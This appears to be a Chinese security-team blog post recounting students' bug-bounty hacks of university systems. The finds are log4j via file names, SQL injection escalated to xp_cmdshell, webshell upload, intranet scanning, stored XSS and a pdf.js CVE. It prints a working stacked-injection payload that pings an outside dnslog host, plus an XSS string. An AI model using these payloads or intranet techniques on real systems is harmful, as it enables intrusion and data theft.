正文

学员挖掘母校实战案例+4月湘安漏洞库平台优秀实战案例

admin
admin V管理员 /3 评论 /21 阅读
0618
文章最后更新时间2026年06月18日,若文章内容或图片失效,请留言反馈!
声明:由于传播、利用本公众号湘安无事所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。如有侵权烦请告知,我们会立即删除并致歉。

前言

最近漏洞盒子没怎么发项目给深情哥,所以没怎么挖赏金src,刚好周末小灶的问题不多,闲来无事帮学员看看母校。

没怎么认真挖,就挖了一个sql注入出来,我们还是来看看上个月湘安无事团队内部漏洞的学员优秀文章

文件上传处的log4j漏洞

学员某个学院的rce报告

首先打开小程序,发现存在访客

直接测上传,发现文件名存在log4j,有意思!!!!

dnslog收到了回显,下次你们可以试试。

edu众测报告拿下2000大洋

先来展示成果

登录口存在sql注入
使用yakit发包,判断数据库类型为SQLserver,堆叠延时注入成功
登录口base64双重加密了
直接开启xp_cmdshell,并实现ping dnslog
{{base64enc({{base64enc(admin'EXEC sp_configure 'show advanced options',1;RECONFIGURE;exec master..xp_cmdshell 'ping fb277440ea.ddns.1433.eu.org.';--') AND 1=2 --)}}
这里一直想让他远程下载exe执行exe然后上线,然后一直没成功,草了
但是写马子又要路径。
那我们是不是可以让页面报错,拿到他的路径勒,卧槽还真有。
然后就直接写马了,这里其实可以写sqlmap的tapmer脚本直接--os-shell的。直接一下echo命令就行了
访问,解析成功
然后裤裤的内网漫游了,学校的内网你懂的,直接一fscan把锁了
1)nacos漏洞
登录成功
2)若以系统泄露大量敏感信息
3)密码碰撞,好多弱口令,下次可以让ai打一下内网试试
零散散差不多打了2000多分吧,太有实力了学员。

直播挖学员母校实战案例

某天学员说挖他看一下母校,刚好小灶没人问问题就安排一下了

出了一些很常见的漏洞,毕竟直播挖的,没什么骚思路的报告。
xss一处,在查看电子图书,选择一本电子书,然后添加想法
<imgsrc=xonerror=alert(1)>会被解析,存在存储型xss
点击笔记预览
有意思应该是这个报告,CVE-2024-4367漏洞,发现一个上传点
直接上传CVE-2024-4367.pdf,他是一个pdfjs的组件漏洞
预览这个pdf可以直接弹窗,是js导致的。
以前的b站视频讲过,b站视频链接如下
【src众测分享2k的pdf-js的漏洞报告】 https://www.bilibili.com/video/BV18ibue3Ehn/?share_source=copy_web&vd_source=40d3d8c4cbf8bd3dc4fe6391b8b8f8dd
成果如下:感觉没什么精彩的点,莫非我对自己的要求越来越高了?
都上传了湘安内部漏洞库平台了,自行观看。

安内部漏洞库平台说明

符合再团队而且rank达到88以上的同学可以找我领取内部漏洞库平台邀请码。

其中湘安无事团队内部漏洞平台月榜前三的同学我们会发送kfc奖励,edu漏洞平台的月榜前三我们也会,一起交流,一起吃kfc拉。
加入湘安无事edu团队的同学凭证明,我到时候拉个群,再语雀放点学员和成员愿意公开的案例报告,互相交流互相进步。


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com-周飒博客